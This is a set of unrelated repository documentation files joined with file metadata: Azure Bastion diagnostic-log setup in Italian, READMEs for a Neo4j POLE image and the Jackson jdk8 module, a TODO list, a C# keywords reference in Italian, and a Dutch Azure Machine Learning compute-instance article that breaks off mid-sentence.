articles/bastion/diagnostic-logs.md
maiemy/azure-docs.it-it
b3649d817c2ec64a3738b5f05f18f85557d0d9b6
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/bastion/diagnostic-logs.md
maiemy/azure-docs.it-it
b3649d817c2ec64a3738b5f05f18f85557d0d9b6
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Abilitare e usare i log delle risorse di Azure Bastion description: Questo articolo illustra come abilitare e usare i log di diagnostica di Azure Bastion. services: bastion author: charwen ms.service: bastion ms.topic: how-to ms.date: 02/03/2020 ms.author: charwen ms.openlocfilehash: 1e76fffd17ee565d4103ca8a7bf1523bbd16209d ms.sourcegitcommit: 829d951d5c90442a38012daaf77e86046018e5b9 ms.translationtype: MT ms.contentlocale: it-IT ms.lasthandoff: 10/09/2020 ms.locfileid: "91445388" --- # <a name="enable-and-work-with-bastion-resource-logs"></a>Abilitare e usare i log delle risorse Bastion Poiché gli utenti si connettono ai carichi di lavoro con Azure Bastion, Bastion può registrare la diagnostica delle sessioni remote. È quindi possibile usare la diagnostica per visualizzare gli utenti connessi ai carichi di lavoro, al momento, da dove e altre informazioni di registrazione rilevanti. Per usare la diagnostica, è necessario abilitare i log di diagnostica in Azure Bastion. Questo articolo consente di abilitare i log di diagnostica e di visualizzare i log. ## <a name="enable-the-resource-log"></a><a name="enable"></a>Abilitare il log delle risorse 1. Nella [portale di Azure](https://portal.azure.com)passare alla risorsa di Azure Bastion e selezionare impostazioni di **diagnostica** dalla pagina del Bastion di Azure. ![Screenshot che mostra la pagina "impostazioni di diagnostica".](./media/diagnostic-logs/1diagnostics-settings.png) 2. Selezionare **impostazioni di diagnostica**, quindi selezionare **+ Aggiungi** impostazioni di diagnostica per aggiungere una destinazione per i log. ![Screenshot che mostra la pagina "impostazioni di diagnostica" con il pulsante "Aggiungi impostazione di diagnostica" selezionato.](./media/diagnostic-logs/2add-diagnostic-setting.png) 3. Nella pagina **impostazioni di diagnostica** selezionare il tipo di account di archiviazione da usare per l'archiviazione dei log di diagnostica. ![Screenshot della pagina "impostazioni di diagnostica" con la sezione per selezionare un percorso di archiviazione evidenziato.](./media/diagnostic-logs/3add-storage-account.png) 4. Una volta completate le impostazioni, l'aspetto sarà simile a questo esempio: ![impostazioni di esempio](./media/diagnostic-logs/4example-settings.png) ## <a name="view-diagnostics-log"></a><a name="view"></a>Visualizza log di diagnostica Per accedere ai log di diagnostica, è possibile usare direttamente l'account di archiviazione specificato durante l'abilitazione delle impostazioni di diagnostica. 1. Passare alla risorsa dell'account di archiviazione e quindi ai **contenitori**. Viene visualizzato il BLOB **Insights-logs-bastionauditlogs** creato nel contenitore BLOB dell'account di archiviazione. ![impostazioni di diagnostica](./media/diagnostic-logs/1-navigate-to-logs.png) 2. Quando ci si sposta all'interno del contenitore, nel Blog vengono visualizzate diverse cartelle. Queste cartelle indicano la gerarchia delle risorse per la risorsa di Azure Bastion. ![Aggiungi impostazione di diagnostica](./media/diagnostic-logs/2-resource-h.png) 3. Passare alla gerarchia completa della risorsa di Azure Bastion i cui log di diagnostica si vuole accedere/visualizzare. ' Y =',' m'=',' d'=',' h =' è m'=' indicano rispettivamente l'anno, il mese, il giorno, l'ora e il minuto per i log delle risorse. ![Selezionare il percorso di archiviazione](./media/diagnostic-logs/3-resource-location.png) 4. Individuare il file JSON creato da Azure Bastion che contiene i dati del log di diagnostica per il periodo di tempo a cui si è passati. 5. Scaricare il file JSON dal contenitore BLOB di archiviazione. Di seguito è riportata una voce di esempio del file JSON per riferimento: ```json { "time":"2019-10-03T16:03:34.776Z", "resourceId":"/SUBSCRIPTIONS/<subscripionID>/RESOURCEGROUPS/MYBASTION/PROVIDERS/MICROSOFT.NETWORK/BASTIONHOSTS/MYBASTION-BASTION", "operationName":"Microsoft.Network/BastionHost/connect", "category":"BastionAuditLogs", "level":"Informational", "location":"eastus", "properties":{ "userName":"<username>", "userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36", "clientIpAddress":"131.107.159.86", "clientPort":24039, "protocol":"ssh", "targetResourceId":"/SUBSCRIPTIONS/<subscripionID>/RESOURCEGROUPS/MYBASTION/PROVIDERS/MICROSOFT.COMPUTE/VIRTUALMACHINES/LINUX-KEY", "subscriptionId":"<subscripionID>", "message":"Successfully Connected.", "resourceType":"VM", "targetVMIPAddress":"172.16.1.5", "tunnelId":"<tunnelID>" }, "FluentdIngestTimestamp":"2019-10-03T16:03:34.0000000Z", "Region":"eastus", "CustomerSubscriptionId":"<subscripionID>" } ``` ## <a name="next-steps"></a>Passaggi successivi Leggere le [domande frequenti su Bastion](bastion-faq.md).
59.445783
472
0.765302
ita_Latn
0.976681
6f5901d2e93461fb017c1033eb92467114aea19d
883
md
Markdown
pole/README.md
syedhassaanahmed/neo4j-datasets
dde428cdb85b0367915c57cd44642b3f85e96093
[ "MIT" ]
4
2018-12-16T07:19:11.000Z
2021-03-24T02:55:53.000Z
pole/README.md
syedhassaanahmed/neo4j-datasets
dde428cdb85b0367915c57cd44642b3f85e96093
[ "MIT" ]
1
2020-12-09T19:17:40.000Z
2021-01-13T14:48:55.000Z
pole/README.md
syedhassaanahmed/neo4j-datasets
dde428cdb85b0367915c57cd44642b3f85e96093
[ "MIT" ]
2
2020-08-30T19:12:27.000Z
2021-03-24T03:02:45.000Z
# pole [![Docker Build Status](https://img.shields.io/docker/cloud/build/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/builds/) [![MicroBadger Size](https://img.shields.io/microbadger/image-size/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/tags/) [![Docker Pulls](https://img.shields.io/docker/pulls/syedhassaanahmed/neo4j-pole.svg?logo=docker)](https://hub.docker.com/r/syedhassaanahmed/neo4j-pole/) Docker image hosting Neo4j Database of POLE. POLE stands for People, Objects, Locations and Events and are a type of databases typically used in police/intelligence use cases. ## Credits - **Jesús Barrasa** for publishing the [POLE dataset](https://github.com/jbarrasa/datasets/tree/master/safeguarding) and the descriptive [guide](http://guides.neo4j.com/field/pole.html).
126.142857
500
0.784824
yue_Hant
0.308364
6f596460d09f5a65824ae30991f81e9d4f19c54e
166
md
Markdown
README.md
ismdeep/public-doc
d5e8b5c029fe08442e3187bf9ccad8ee73517967
[ "MIT" ]
null
null
null
README.md
ismdeep/public-doc
d5e8b5c029fe08442e3187bf9ccad8ee73517967
[ "MIT" ]
null
null
null
README.md
ismdeep/public-doc
d5e8b5c029fe08442e3187bf9ccad8ee73517967
[ "MIT" ]
null
null
null
# L. Jiang's Wiki Repo: [https://github.com/ismdeep/public-doc](https://github.com/ismdeep/public-doc) HOME: [http://65.49.216.71:8090/](http://65.49.216.71:8090/)
27.666667
84
0.680723
yue_Hant
0.296112
6f5969b72a148efe7b8367b2f78cb26f0d3a4b73
642
md
Markdown
docs/TODO.md
unadlib/fronts
874103ce1828c0b53e19f2a8e07de7a6a92b0321
[ "MIT" ]
483
2021-05-24T04:39:18.000Z
2022-03-22T06:24:09.000Z
docs/TODO.md
unadlib/fronts
874103ce1828c0b53e19f2a8e07de7a6a92b0321
[ "MIT" ]
37
2021-05-11T18:16:32.000Z
2022-02-27T14:22:53.000Z
docs/TODO.md
unadlib/fronts
874103ce1828c0b53e19f2a8e07de7a6a92b0321
[ "MIT" ]
41
2021-06-27T03:09:01.000Z
2022-03-09T17:37:38.000Z
## TODO - [ ] `fronts-webpack` - 2.10 - [ ] `fronts-vite` - 2.10 - [ ] `fronts-sandbox`- 2.10 - [ ] `fronts-html`- 2.10 - [ ] `fronts-vue`- 2.10 - [ ] `fronts-ng` - [ ] UT/IT/E2E - [ ] Doc for API - [ ] Support static `import` for version control - [ ] refactor `import()` for version control - [ ] `fronts-svelte` - [ ] `fronts-solid` - [ ] `fronts-builder` - [ ] `fronts-cli` - [ ] `fronts-c4` - [ ] `fronts-ssr` - [ ] `fronts-registry` with `semver` for version control - [ ] `fronts-vscode-toolkit` - [ ] `fronts-extension` - [ ] `fronts-logger` - [ ] Building tools CLI - [ ] Error handling/Fallback - [ ] Logger/Debugger/Testing tools
24.692308
57
0.587227
yue_Hant
0.724127
6f5a1633813b18e8f136d62802300e5e9e55e250
2,300
md
Markdown
datatypes/README.md
rahuldeepattri/jackson-modules-java8
766409f7612cc17c0ae23b2efcade70580cd6041
[ "Apache-2.0" ]
370
2016-11-06T08:42:35.000Z
2022-03-26T01:37:03.000Z
datatypes/README.md
Exnadella/jackson-modules-java8
5a006c562d98344184779963dceea4d5959b8371
[ "Apache-2.0" ]
215
2016-11-03T03:18:41.000Z
2022-03-30T16:40:37.000Z
datatypes/README.md
Exnadella/jackson-modules-java8
5a006c562d98344184779963dceea4d5959b8371
[ "Apache-2.0" ]
119
2016-11-03T11:07:20.000Z
2022-01-26T16:56:33.000Z
Jackson module that adds supports for JDK datatypes included in version 8 which can not be directly supported by core databind due to baseline being JDK 6, excluding following: * New Date/Time datatypes (supported by `jackson-datatype-jsr310` module) * Support for parameter names (supported by `jackson-module-parameter-names`) NOTE: only available for Jackson 2.x; functionality included in `jackson-databind` itself for Jackson 3.x. ## Usage ### Maven dependency To use module on Maven-based projects, use following dependency: ```xml <dependency> <groupId>com.fasterxml.jackson.datatype</groupId> <artifactId>jackson-datatype-jdk8</artifactId> <version>2.12.2</version> </dependency> ``` (or whatever version is most up-to-date at the moment) ### Registering module Like all standard Jackson modules (libraries that implement Module interface), registration is done as follows: ```java ObjectMapper mapper = new ObjectMapper(); mapper.registerModule(new Jdk8Module()); // Or, the more fluent version: ObjectMapper mapper = new ObjectMapper().registerModule(new Jdk8Module()); ``` after which functionality is available for all normal Jackson operations: you can read JSON into supported JDK8 types, as well as write values of such types as JSON, so that for example: ```java class Contact { private final String name; private final Optional<String> email; public Contact(String name, Optional<String> email) { this.name = name; this.email = email; } public String getName() { return name; } public Optional<String> getEmail() { return email; } } ... Contact nullEmail = new Contact("Example Co.", null); String nullEmailJson = mapper.writeValueAsString(nullEmail); // prints: {"name":"Example Co.","email":null} System.out.println(nullEmailJson); Contact emptyEmail = new Contact("Example Co.", Optional.empty()); String emptyEmailJson = mapper.writeValueAsString(emptyEmail); // prints: {"name":"Example Co.","email":null} System.out.println(emptyEmailJson); Contact withEmail = new Contact("Example Co.", Optional.of("info@example.com")); String withEmailJson = mapper.writeValueAsString(withEmail); // prints: {"name":"Example Co.","email":"info@example.com"} System.out.println(withEmailJson); ```
30.263158
112
0.735652
eng_Latn
0.908524
6f5a4de262f6c8f25bc6d2f5ac74a6ee99f54b7f
3,619
md
Markdown
docs/csharp/language-reference/keywords/contextual-keywords.md
Dodozz/docs.it-it
f34c4bb1e8afb7492f8512359d32a9156c9c768d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/csharp/language-reference/keywords/contextual-keywords.md
Dodozz/docs.it-it
f34c4bb1e8afb7492f8512359d32a9156c9c768d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/csharp/language-reference/keywords/contextual-keywords.md
Dodozz/docs.it-it
f34c4bb1e8afb7492f8512359d32a9156c9c768d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Parole chiave contestuali - Riferimenti per C# ms.custom: seodec18 ms.date: 03/07/2017 helpviewer_keywords: - contextual keywords [C#] ms.assetid: 7c76bc29-a754-4389-b0ab-f6b441018298 ms.openlocfilehash: bce8901b4fec4386462ebaa85436b52aedc3f3bf ms.sourcegitcommit: 6b308cf6d627d78ee36dbbae8972a310ac7fd6c8 ms.translationtype: HT ms.contentlocale: it-IT ms.lasthandoff: 01/23/2019 ms.locfileid: "54708441" --- # <a name="contextual-keywords-c-reference"></a>Parole chiave contestuali (Riferimenti per C#) Una parola chiave contestuale viene usata per conferire un significato particolare nel codice, ma non è una parola riservata in C#. Questa sezione presenta le seguenti parole chiave contestuali: |Parola chiave|Description| |-------------|-----------------| |[add](../../../csharp/language-reference/keywords/add.md)|Definisce una funzione di accesso eventi personalizzata che viene chiamata quando il codice client esegue la sottoscrizione all'evento.| |[async](../../../csharp/language-reference/keywords/async.md)|Indica che il metodo specificato, l'espressione lambda o il metodo anonimo è asincrono.| |[await](../../../csharp/language-reference/keywords/await.md)|Sospende un metodo asincrono finché non viene completata un'attività attesa.| |[dynamic](../../../csharp/language-reference/keywords/dynamic.md)|Definisce un tipo di riferimento che abilita operazioni in cui il tipo appare per ignorare il controllo del tipo in fase di compilazione.| |[get](../../../csharp/language-reference/keywords/get.md)|Definisce un metodo di accesso per una proprietà o un indicizzatore.| |[global](../../../csharp/language-reference/keywords/global.md)|Specifica lo spazio dei nomi globale predefinito, che altrimenti non è provvisto di nome.| |[partial](../../../csharp/language-reference/keywords/partial-type.md)|Definisce classi, struct e interfacce parziali all'interno della stessa unità di compilazione.| |[remove](../../../csharp/language-reference/keywords/remove.md)|Definisce una funzione di accesso eventi personalizzata che viene chiamata quando il codice client annulla la sottoscrizione all'evento.| |[set](../../../csharp/language-reference/keywords/set.md)|Definisce un metodo di accesso per una proprietà o un indicizzatore.| |[value](../../../csharp/language-reference/keywords/value.md)|Viene usata per impostare metodi di accesso e per aggiungere o rimuovere gestori eventi.| |[var](../../../csharp/language-reference/keywords/var.md)|Consente che il tipo di una variabile dichiarata nell'ambito del metodo sia determinato dal compilatore.| |[when](when.md)|Specifica una condizione di filtro per un blocco `catch` o l'etichetta `case` di un'istruzione `switch`.| |[where](../../../csharp/language-reference/keywords/where-generic-type-constraint.md)|Aggiunge vincoli a una dichiarazione generica. (Vedere anche [where](../../../csharp/language-reference/keywords/where-clause.md)).| |[yield](../../../csharp/language-reference/keywords/yield.md)|Viene usata in un blocco iteratore per la restituzione di un valore all'oggetto enumeratore o per segnalare la fine dell'iterazione.| Anche tutte le parole chiave di query introdotte in C# 3.0 sono contestuali. Per altre informazioni, vedere [Parole chiave di query (LINQ)](../../../csharp/language-reference/keywords/query-keywords.md). ## <a name="see-also"></a>Vedere anche - [Riferimenti per C#](../../../csharp/language-reference/index.md) - [Guida per programmatori C#](../../../csharp/programming-guide/index.md) - [Parole chiave di C#](../../../csharp/language-reference/keywords/index.md)
86.166667
221
0.75297
ita_Latn
0.9799
6f5a7e08119f1fa25a3ad86ad3ebc8fedb417956
17,538
md
Markdown
articles/machine-learning/concept-compute-instance.md
mtaheij/azure-docs.nl-nl
6447611648064a057aae926a62fe8b6d854e3ea6
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/concept-compute-instance.md
mtaheij/azure-docs.nl-nl
6447611648064a057aae926a62fe8b6d854e3ea6
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/concept-compute-instance.md
mtaheij/azure-docs.nl-nl
6447611648064a057aae926a62fe8b6d854e3ea6
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Wat is een Azure Machine Learning-rekeninstantie? titleSuffix: Azure Machine Learning description: Meer informatie over de Azure Machine Learning Compute-instantie, een volledig beheerd werk station in de Cloud. services: machine-learning ms.service: machine-learning ms.subservice: core ms.topic: conceptual ms.author: sgilley author: sdgilley ms.date: 08/25/2020 ms.openlocfilehash: 14229af9766f6604e71713f835935d43f6c7fcc6 ms.sourcegitcommit: 32c521a2ef396d121e71ba682e098092ac673b30 ms.translationtype: MT ms.contentlocale: nl-NL ms.lasthandoff: 09/25/2020 ms.locfileid: "91330142" --- # <a name="what-is-an-azure-machine-learning-compute-instance"></a>Wat is een Azure Machine Learning-rekeninstantie? Een Azure Machine Learning Compute-instantie is een beheerd werk station in de Cloud voor gegevens wetenschappers. Reken instanties maken het eenvoudig om aan de slag te gaan met Azure Machine Learning-ontwikkeling en bieden mogelijkheden voor het beheer en de bedrijfs voorbereiding voor IT-beheerders. Gebruik een reken instantie als uw volledig geconfigureerde en beheerde ontwikkel omgeving in de Cloud voor machine learning. Ze kunnen ook worden gebruikt als een reken doel voor training en demijnen voor ontwikkelings-en test doeleinden. Gebruik een [Azure machine learning Compute-Cluster](how-to-create-attach-compute-sdk.md#amlcompute) met mogelijkheden voor schalen op meerdere knoop punten voor de training van productie-kwaliteits modellen. Gebruik [Azure Kubernetes service-cluster](how-to-deploy-azure-kubernetes-service.md)voor productie kwaliteit van het model. ## <a name="why-use-a-compute-instance"></a>Waarom een reken instantie gebruiken? Een reken instantie is een volledig beheerd, op de cloud gebaseerd werk station dat is geoptimaliseerd voor uw machine learning-ontwikkel omgeving. Het biedt de volgende voor delen: |Belangrijkste voordelen|Beschrijving| |----|----| |Productiviteit|U kunt modellen bouwen en implementeren met behulp van geïntegreerde notebooks en de volgende hulpprogram ma's in Azure Machine Learning studio:<br/>-Jupyter<br/>-Jjupyterlab<br/>-RStudio (preview-versie)<br/>Reken instantie is volledig geïntegreerd met Azure Machine Learning werk ruimte en Studio. U kunt notitie blokken en gegevens delen met andere gegevens wetenschappers in de werk ruimte. U kunt ook met [SSH](how-to-set-up-vs-code-remote.md) externe ontwikkeling met behulp van code instellen | |Beheerde & beveiligd|Verminder uw beveiligings footprint en voeg naleving toe met beveiligings vereisten voor ondernemingen. Reken instanties bieden robuust beheer beleid en beveiligde netwerk configuraties zoals:<br/><br/>-Autoinrichting van Resource Manager-sjablonen of Azure Machine Learning SDK<br/>- [Op rollen gebaseerd toegangs beheer op basis van Azure (Azure RBAC)](/azure/role-based-access-control/overview)<br/>- [Ondersteuning voor virtuele netwerken](how-to-enable-virtual-network.md#compute-instance)<br/>-SSH-beleid voor het inschakelen/uitschakelen van SSH-toegang<br/>TLS 1,2 ingeschakeld | |Vooraf geconfigureerd &nbsp; voor &nbsp; ml|Bespaar tijd bij het instellen van taken met vooraf geconfigureerde en up-to-date ML-pakketten, diepe leer frameworks, GPU-Stuur Programma's.| |Volledig aanpasbaar|Uitgebreide ondersteuning voor Azure VM-typen, waaronder Gpu's en persistente aanpassing op laag niveau, zoals het installeren van pakketten en stuur Programma's, maakt een koud probleem van geavanceerde scenario's. | ## <a name="tools-and-environments"></a><a name="contents"></a>Hulpprogram ma's en omgevingen > [!IMPORTANT] > Items die zijn gemarkeerd (preview) in dit artikel zijn momenteel beschikbaar als open bare preview. > De preview-versie wordt aangeboden zonder Service Level Agreement en wordt niet aanbevolen voor productieworkloads. Misschien worden bepaalde functies niet ondersteund of zijn de mogelijkheden ervan beperkt. Zie [Supplemental Terms of Use for Microsoft Azure Previews (Aanvullende gebruiksvoorwaarden voor Microsoft Azure-previews)](https://azure.microsoft.com/support/legal/preview-supplemental-terms/) voor meer informatie. Met Azure Machine Learning Compute-instantie kunt u modellen ontwerpen, trainen en implementeren in een volledig geïntegreerde laptop ervaring in uw werk ruimte. Deze hulpprogram ma's en omgevingen zijn geïnstalleerd op het reken exemplaar: |Algemene hulpprogram ma's & omgevingen|Details| |----|:----:| |Stuurprogramma's|`CUDA`</br>`cuDNN`</br>`NVIDIA`</br>`Blob FUSE` | |Intel MPI-bibliotheek|| |Azure CLI || |Azure Machine Learning-voor beelden || |Docker|| |Nginx|| |NCCL 2,0 || |Protobuf|| |**R** -hulpprogram ma's & omgevingen|Details| |----|:----:| |RStudio server open source Edition (preview-versie)|| |R-kernel|| |Azure Machine Learning SDK voor R|[azuremlsdk](https://azure.github.io/azureml-sdk-for-r/reference/index.html)</br>SDK steekproeven| |**PYTHON** -hulpprogram ma's & omgevingen|Details| |----|----| |Anaconda Python|| |Jupyter en-extensies|| |Jjupyterlab en-extensies|| [Azure Machine Learning-SDK voor Python](https://docs.microsoft.com/python/api/overview/azure/ml/intro?view=azure-ml-py&preserve-view=true)</br>van PyPI|Omvat het meren deel van de extra azureml-pakketten. Als u de volledige lijst wilt weer geven, [opent u een Terminal venster op uw reken exemplaar](how-to-run-jupyter-notebooks.md#terminal) en voert u uit <br/> `conda list -n azureml_py36 azureml*` | |Andere PyPI-pakketten|`jupytext`</br>`tensorboard`</br>`nbconvert`</br>`notebook`</br>`Pillow`| |Conda-pakketten|`cython`</br>`numpy`</br>`ipykernel`</br>`scikit-learn`</br>`matplotlib`</br>`tqdm`</br>`joblib`</br>`nodejs`</br>`nb_conda_kernels`| |Uitgebreide leer pakketten|`PyTorch`</br>`TensorFlow`</br>`Keras`</br>`Horovod`</br>`MLFlow`</br>`pandas-ml`</br>`scrapbook`| |ONNX-pakketten|`keras2onnx`</br>`onnx`</br>`onnxconverter-common`</br>`skl2onnx`</br>`onnxmltools`| |Azure Machine Learning python & R SDK-voor beelden|| Python-pakketten zijn allemaal geïnstalleerd in de **Python 3,6-AzureML-** omgeving. ### <a name="installing-packages"></a>Pakketten installeren U kunt pakketten rechtstreeks installeren in Jupyter Notebook of RStudio: * RStudio gebruik het tabblad **pakketten** aan de rechter kant of op het tabblad **console** linksboven. * Python: Voeg een installatie code toe en voer deze uit in een Jupyter Notebook-cel. Of u kunt op een van de volgende manieren toegang krijgen tot een Terminal venster: * RStudio: Selecteer het tabblad **Terminal** aan de rechter bovenhoek. * Jupyter Lab: Selecteer de tegel **Terminal** onder de **andere** kop op het tabblad Start. * Jupyter: Selecteer **nieuwe>Terminal** rechtsboven op het tabblad bestanden. * SSH naar de computer. Installeer Python-pakketten vervolgens in de **Python 3,6-AzureML-** omgeving. R-pakketten installeren in de **R** -omgeving. ### <a name="add-new-kernels"></a>Nieuwe kernels toevoegen Een nieuwe Jupyter-kernel toevoegen aan het reken exemplaar: 1. Nieuwe terminal maken van het deel venster Jupyter, Jjupyterlab of van notitie blokken of SSH in het reken exemplaar 2. Gebruik het Terminal venster om een nieuwe omgeving te maken. De onderstaande code maakt bijvoorbeeld `newenv` : ```shell conda create --name newenv ``` 3. Activeer de omgeving. Bijvoorbeeld na het maken van `newenv` : ```shell conda activate newenv ``` 4. PIP-en ipykernel-pakket installeren in de nieuwe omgeving en een kernel maken voor die Conda env ```shell conda install pip conda install ipykernel python -m ipykernel install --user --name newenv --display-name "Python (newenv)" ``` Een van de [beschik bare Jupyter-kernels](https://github.com/jupyter/jupyter/wiki/Jupyter-kernels) kan worden geïnstalleerd. ## <a name="accessing-files"></a>Toegang tot bestanden Notebooks en R-scripts worden opgeslagen in het standaard opslag account van uw werk ruimte in de Azure-bestands share. Deze bestanden bevinden zich in de map gebruikers bestanden. Met deze opslag kunt u eenvoudig notitie blokken delen tussen Compute-exemplaren. Het opslag account zorgt er ook voor dat uw notitie blokken veilig blijven behouden wanneer u een reken instantie stopt of verwijdert. Het account van de Azure-bestands share van uw werk ruimte is gekoppeld als een station op het reken exemplaar. Dit station is de standaard werkmap voor Jupyter, Jupyter Labs en RStudio. Dit betekent dat de notitie blokken en andere bestanden die u maakt in Jupyter, Jjupyterlab of RStudio automatisch worden opgeslagen op de bestands share en ook beschikbaar zijn voor gebruik in andere reken instanties. De bestanden in de bestands share zijn toegankelijk vanuit alle reken instanties in dezelfde werk ruimte. Wijzigingen in deze bestanden op het reken exemplaar worden betrouwbaar weer gegeven in de bestands share. U kunt de meest recente Azure Machine Learning-voor beelden ook klonen naar uw map in de map gebruikers bestanden in de werkruimte bestands share. Het schrijven van kleine bestanden kan langzamer zijn op netwerk stations dan het schrijven naar de lokale schijf van de reken instantie zelf. Als u veel kleine bestanden schrijft, kunt u een map rechtstreeks op het reken exemplaar gebruiken, zoals een `/tmp` Directory. Houd er rekening mee dat deze bestanden niet toegankelijk zijn vanuit andere compute-exemplaren. U kunt de `/tmp` Directory op het reken exemplaar voor uw tijdelijke gegevens gebruiken. Schrijf echter geen grote gegevens bestanden op de besturingssysteem schijf van het reken exemplaar. Gebruik in plaats daarvan [gegevens opslag](concept-azure-machine-learning-architecture.md#datasets-and-datastores) . Als u de Jjupyterlab Git-extensie hebt geïnstalleerd, kan deze ook leiden tot trage prestaties van reken instanties. ## <a name="managing-a-compute-instance"></a>Een reken instantie beheren Selecteer in uw werk ruimte in Azure Machine Learning Studio **Compute**en selecteer vervolgens **Compute instance** bovenin. ![Een reken instantie beheren](./media/concept-compute-instance/manage-compute-instance.png) U kunt de volgende acties uitvoeren: * [Maak een reken instantie](#create). * Vernieuw het tabblad Compute instances. * Een reken instantie starten, stoppen en opnieuw starten. U betaalt voor de instantie wanneer deze wordt uitgevoerd. Stop de reken instantie wanneer u deze niet gebruikt om de kosten te verlagen. Als u een reken instantie stopt, wordt de toewijzing ervan ongedaan. Start het vervolgens opnieuw wanneer u het nodig hebt. * Een reken instantie verwijderen. * De lijst met reken processen filteren om alleen de items weer te geven die u hebt gemaakt. Voor elk reken proces in uw werk ruimte die u kunt gebruiken, kunt u het volgende doen: * Toegang tot Jupyter, Jjupyterlab, RStudio op het reken exemplaar * SSH naar Compute-instantie. SSH-toegang is standaard uitgeschakeld, maar kan worden ingeschakeld op het moment dat het reken proces wordt gemaakt. SSH-toegang is via het mechanisme voor open bare/persoonlijke sleutels. Op het tabblad krijgt u details over SSH-verbindingen zoals IP-adres, gebruikers naam en poort nummer. * Details ophalen over een specifiek reken exemplaar, zoals het IP-adres en de regio. Met [RBAC](/azure/role-based-access-control/overview) kunt u bepalen welke gebruikers in de werk ruimte een reken instantie kunnen maken, verwijderen, starten, stoppen en opnieuw starten. Alle gebruikers in de rol Inzender en eigenaar van de werk ruimte kunnen reken instanties maken, verwijderen, starten, stoppen en opnieuw starten in de werk ruimte. Maar alleen de maker van een specifiek reken exemplaar of de gebruiker die is toegewezen als deze namens hen is gemaakt, heeft toegang tot Jupyter, Jjupyterlab en RStudio op die reken instantie. Een reken instantie is toegewezen aan één gebruiker met hoofd toegang en kan worden terminal in via Jupyter/Jjupyterlab/RStudio. Reken instantie heeft aanmelding voor één gebruiker en alle acties gebruiken de identiteit van die gebruiker voor RBAC en de toewijzing van experimenten. SSH-toegang wordt beheerd via het mechanisme voor open bare/persoonlijke sleutels. Deze acties kunnen worden beheerd door RBAC: * *Micro soft. MachineLearningServices/werk ruimten/reken-en lees bewerkingen* * *Micro soft. MachineLearningServices/werk ruimten/reken kracht/schrijven* * *Micro soft. MachineLearningServices/werk ruimten/berekenen/verwijderen* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/starten/actie* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/stoppen/actie* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/opnieuw opstarten/actie* ### <a name="create-a-compute-instance"></a><a name="create"></a>Een rekenproces maken Maak in uw werk ruimte in Azure Machine Learning Studio [een nieuw reken exemplaar](how-to-create-attach-compute-studio.md#compute-instance) van het gedeelte **Compute** of in de sectie **notebooks** , wanneer u klaar bent om een van uw notitie blokken uit te voeren. U kunt ook een exemplaar maken * Rechtstreeks vanuit de [ervaring met geïntegreerde notebooks](tutorial-1st-experiment-sdk-setup.md#azure) * In Azure Portal * Van Azure Resource Manager sjabloon. Zie de [sjabloon Create a Azure machine learning Compute instance](https://github.com/Azure/azure-quickstart-templates/tree/master/101-machine-learning-compute-create-computeinstance)voor een voorbeeld sjabloon. * Met [Azure machine learning SDK](https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/training/train-on-computeinstance/train-on-computeinstance.ipynb) * Vanuit de [cli-uitbrei ding voor Azure machine learning](reference-azure-machine-learning-cli.md#computeinstance) De toegewezen kernen per regio per VM-serie quota en het totale regionale quotum, dat van toepassing is op het maken van een reken instantie, worden gecombineerd en gedeeld met Azure Machine Learning trainings berekenings cluster quotum. Wanneer het reken exemplaar wordt gestopt, wordt er geen quotum vrijgegeven om ervoor te zorgen dat u het reken exemplaar opnieuw kunt starten. ### <a name="create-on-behalf-of-preview"></a>Maken namens (preview-versie) Als beheerder kunt u een compute-instantie maken namens een gegevens wetenschapper en de instantie hieraan toewijzen met: * [Azure Resource Manager sjabloon](https://github.com/Azure/azure-rest-api-specs/blob/master/specification/machinelearningservices/resource-manager/Microsoft.MachineLearningServices/preview/2020-09-01-preview/examples/createComputeInstance.json). Zie [identiteits object-Id's zoeken voor verificatie configuratie](../healthcare-apis/find-identity-object-ids.md)voor meer informatie over het vinden van de TenantID en ObjectID die nodig zijn in deze sjabloon. U kunt deze waarden ook vinden in de Azure Active Directory Portal. * REST-API De gegevens wetenschapper u het reken exemplaar maakt voor heeft de volgende RBAC-machtigingen nodig: * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/starten/actie* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/stoppen/actie* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/opnieuw opstarten/actie* * *Micro soft. MachineLearningServices/werk ruimten/berekeningen/applicationaccess/actie* De gegevens wetenschapper kunnen het reken proces starten, stoppen en opnieuw starten. Ze kunnen het reken exemplaar gebruiken voor: * Jupyter * Jjupyterlab * RStudio * Geïntegreerde notebooks ## <a name="compute-target"></a>Rekendoel Reken instanties kunnen worden gebruikt als een [trainings berekenings doel](concept-compute-target.md#train) vergelijkbaar met Azure machine learning Compute-trainings clusters. Een reken instantie: * Bevat een taak wachtrij. * Voert taken veilig uit in een virtuele netwerk omgeving, zonder dat ondernemingen de SSH-poort hoeven te openen. De taak wordt uitgevoerd in een omgeving met containers en verpakt uw model afhankelijkheden in een docker-container. * Kan meerdere kleine taken parallel uitvoeren (preview). Twee taken per kernen kunnen parallel worden uitgevoerd terwijl de rest van de taken in de wachtrij worden geplaatst. * Ondersteunt multi-GPU gedistribueerde trainings taken met één knoop punt U kunt reken instantie gebruiken als een lokaal doel voor het afwijzen van de implementatie voor scenario's voor testen en fout opsporing. ## <a name="what-happened-to-notebook-vm"></a><a name="notebookvm"></a>Wat is er gebeurd met de VM van de notebook? Reken instanties vervangen de VM van de notebook. Alle notitieblok bestanden die zijn opgeslagen in de werkruimte bestands share en gegevens in werkruimte gegevens archieven, zijn toegankelijk vanuit een reken instantie. Alle aangepaste 